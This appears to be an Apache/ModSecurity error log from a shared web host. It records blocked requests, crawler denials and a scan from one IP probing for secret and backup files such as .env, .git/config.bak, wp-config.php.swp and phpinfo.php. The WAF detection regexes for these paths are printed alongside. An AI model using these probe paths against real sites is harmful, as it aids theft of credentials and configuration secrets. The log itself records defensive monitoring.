[Tue May 26 15:14:59.220471 2026] [security2:error] [pid 700087:tid 700250] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrmpPHQM4as9fEIIZ3sgAAACE"]
[Tue May 26 15:14:59.389863 2026] [security2:error] [pid 700087:tid 700275] [client 45.154.98.150:50963] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cuatrodoce.com.mx"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVrm5PHQM4as9fEIIZ3xwAAADo"]
[Tue May 26 15:15:00.886775 2026] [security2:error] [pid 700087:tid 700328] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrnJPHQM4as9fEIIZ34wAAAG8"]
[Tue May 26 15:15:03.628684 2026] [security2:error] [pid 700087:tid 700238] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrn5PHQM4as9fEIIZ4NQAAABU"]
[Tue May 26 15:15:05.637262 2026] [security2:error] [pid 700087:tid 700243] [client 114.119.131.206:24031] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVroZPHQM4as9fEIIZ4dAAAABo"], referer: http://haddingtonwines.com/cart?remove_item=ee26fc66b1369c7625333bedafbfcaf6
[Tue May 26 15:15:05.775347 2026] [security2:error] [pid 700087:tid 700289] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVroZPHQM4as9fEIIZ4bwAAAEg"]
[Tue May 26 15:15:07.247355 2026] [security2:error] [pid 700087:tid 700325] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVropPHQM4as9fEIIZ4nAAAAGw"]
[Tue May 26 15:15:09.147252 2026] [security2:error] [pid 700087:tid 700331] [client 2.57.122.173:55326] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujoverseas.in"] [uri "/secrets/.env"] [unique_id "ahVrpZPHQM4as9fEIIZ4yQAAAHI"]
[Tue May 26 15:15:09.162000 2026] [security2:error] [pid 700087:tid 700341] [client 2.57.122.173:55340] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujoverseas.in"] [uri "/.env"] [unique_id "ahVrpZPHQM4as9fEIIZ4zAAAAHw"]
[Tue May 26 15:15:09.933288 2026] [security2:error] [pid 700087:tid 700289] [client 45.86.0.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVrpZPHQM4as9fEIIZ46wAAAEg"], referer: https://www.anujtradingco.com/
[Tue May 26 15:15:10.477381 2026] [security2:error] [pid 700087:tid 700306] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrppPHQM4as9fEIIZ49QAAAFk"]
[Tue May 26 15:15:10.873360 2026] [security2:error] [pid 700087:tid 700230] [client 43.172.196.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVrppPHQM4as9fEIIZ5DQAAAA0"]
[Tue May 26 15:15:11.622024 2026] [security2:error] [pid 700087:tid 700311] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrp5PHQM4as9fEIIZ5JgAAAF4"]
[Tue May 26 15:15:11.672649 2026] [security2:error] [pid 700087:tid 700094] [remote 216.73.217.110:17805] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/webhook.php"] [unique_id "ahVrp5PHQM4as9fEIIZ5MwAAGQY"]
[Tue May 26 15:15:11.745842 2026] [security2:error] [pid 700087:tid 700338] [client 45.86.0.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVrp5PHQM4as9fEIIZ5OQAAAHk"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1215398&moderation-hash=b2f08f887833d57e2374fa7c02fde8a1
[Tue May 26 15:15:13.509321 2026] [fcgid:warn] [pid 700087:tid 700302] (70014)End of file found: [client 66.132.186.205:44832] mod_fcgid: can't get data from http client
[Tue May 26 15:15:13.932891 2026] [security2:error] [pid 700087:tid 700311] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrqZPHQM4as9fEIIZ5awAAAF4"]
[Tue May 26 15:15:16.900925 2026] [security2:error] [pid 700087:tid 700325] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrrJPHQM4as9fEIIZ5yQAAAGw"]
[Tue May 26 15:15:17.617939 2026] [security2:error] [pid 700087:tid 700314] [client 45.86.0.22:43031] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVrrZPHQM4as9fEIIZ54wAAAGE"], referer: https://anujtradingco.com
[Tue May 26 15:15:18.168078 2026] [security2:error] [pid 700087:tid 700294] [client 114.119.153.20:33095] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "politica-global.com"] [uri "/robots.txt"] [unique_id "ahVrrpPHQM4as9fEIIZ5_QAAAE0"]
[Tue May 26 15:15:18.764015 2026] [security2:error] [pid 700087:tid 700320] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrrpPHQM4as9fEIIZ6CAAAAGc"]
[Tue May 26 15:15:20.204156 2026] [security2:error] [pid 700087:tid 700131] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env"] [unique_id "ahVrsJPHQM4as9fEIIZ6VQAARCs"]
[Tue May 26 15:15:20.331457 2026] [security2:error] [pid 700087:tid 700148] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.docker/.env"] [unique_id "ahVrsJPHQM4as9fEIIZ6ZAAALzw"]
[Tue May 26 15:15:20.331786 2026] [security2:error] [pid 700087:tid 700139] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.pronumbers.com.au"] [uri "/*update.cgi*"] [unique_id "ahVrsJPHQM4as9fEIIZ6YQAALzM"]
[Tue May 26 15:15:20.333782 2026] [security2:error] [pid 700087:tid 700149] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVrsJPHQM4as9fEIIZ6ZgAALz0"]
[Tue May 26 15:15:20.336020 2026] [security2:error] [pid 700087:tid 700144] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env"] [unique_id "ahVrsJPHQM4as9fEIIZ6aQAALzg"]
[Tue May 26 15:15:20.459600 2026] [security2:error] [pid 700087:tid 700151] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.backup"] [unique_id "ahVrsJPHQM4as9fEIIZ6cAAAQz8"]
[Tue May 26 15:15:20.460513 2026] [security2:error] [pid 700087:tid 700153] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.bak"] [unique_id "ahVrsJPHQM4as9fEIIZ6cQAAQ0E"]
[Tue May 26 15:15:20.466337 2026] [security2:error] [pid 700087:tid 700178] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.old"] [unique_id "ahVrsJPHQM4as9fEIIZ6fAAAQ1o"]
[Tue May 26 15:15:20.466520 2026] [security2:error] [pid 700087:tid 700180] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backend/.env"] [unique_id "ahVrsJPHQM4as9fEIIZ6fgAAQ1w"]
[Tue May 26 15:15:20.522972 2026] [security2:error] [pid 700087:tid 700163] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/.env.php"] [unique_id "ahVrsJPHQM4as9fEIIZ6fQAAQ0s"]
[Tue May 26 15:15:20.599123 2026] [security2:error] [pid 700087:tid 700186] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.swp"] [unique_id "ahVrsJPHQM4as9fEIIZ6hQAAZmI"]
[Tue May 26 15:15:20.601545 2026] [security2:error] [pid 700087:tid 700187] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env~"] [unique_id "ahVrsJPHQM4as9fEIIZ6iAAAZmM"]
[Tue May 26 15:15:20.723895 2026] [security2:error] [pid 700087:tid 700174] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.git/config.old"] [unique_id "ahVrsJPHQM4as9fEIIZ6mAAAUVY"]
[Tue May 26 15:15:20.728130 2026] [security2:error] [pid 700087:tid 700175] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.git/config~"] [unique_id "ahVrsJPHQM4as9fEIIZ6mQAAUVc"]
[Tue May 26 15:15:20.729434 2026] [security2:error] [pid 700087:tid 700172] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.git/config.bak"] [unique_id "ahVrsJPHQM4as9fEIIZ6lwAAUVQ"]
[Tue May 26 15:15:21.127374 2026] [security2:error] [pid 700087:tid 700115] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/.wp-config.php.swp"] [unique_id "ahVrsZPHQM4as9fEIIZ63QAAfhs"]
[Tue May 26 15:15:21.127774 2026] [security2:error] [pid 700087:tid 700120] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/ADMIN/.env"] [unique_id "ahVrsZPHQM4as9fEIIZ64AAAfiA"]
[Tue May 26 15:15:21.127954 2026] [security2:error] [pid 700087:tid 700119] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/API/.env"] [unique_id "ahVrsZPHQM4as9fEIIZ64gAAfh8"]
[Tue May 26 15:15:21.131397 2026] [autoindex:error] [pid 700087:tid 700112] [remote 195.178.110.199:35698] AH01276: Cannot serve directory /home1/pronuyyv/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:15:21.252981 2026] [security2:error] [pid 700087:tid 700132] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/APP/.env"] [unique_id "ahVrsZPHQM4as9fEIIZ67wAAKCw"]
[Tue May 26 15:15:21.254104 2026] [security2:error] [pid 700087:tid 700129] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/BACK/.env"] [unique_id "ahVrsZPHQM4as9fEIIZ68QAAKCk"]
[Tue May 26 15:15:21.254180 2026] [security2:error] [pid 700087:tid 700132] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/Api/.env"] [unique_id "ahVrsZPHQM4as9fEIIZ68AAAKCw"]
[Tue May 26 15:15:21.254331 2026] [security2:error] [pid 700087:tid 700135] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/BE/.env"] [unique_id "ahVrsZPHQM4as9fEIIZ68wAAKC8"]
[Tue May 26 15:15:21.254430 2026] [security2:error] [pid 700087:tid 700131] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/BACKEND/.env"] [unique_id "ahVrsZPHQM4as9fEIIZ68gAAKCs"]
[Tue May 26 15:15:21.255913 2026] [security2:error] [pid 700087:tid 700133] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/Backend/.env"] [unique_id "ahVrsZPHQM4as9fEIIZ69QAAKC0"]
[Tue May 26 15:15:21.258273 2026] [security2:error] [pid 700087:tid 700128] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/Be/.env"] [unique_id "ahVrsZPHQM4as9fEIIZ69wAAKCg"]
[Tue May 26 15:15:21.419807 2026] [security2:error] [pid 700087:tid 700295] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrsJPHQM4as9fEIIZ6vQAAAE4"]
[Tue May 26 15:15:21.505303 2026] [security2:error] [pid 700087:tid 700155] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVrsZPHQM4as9fEIIZ7IQAAXEM"]
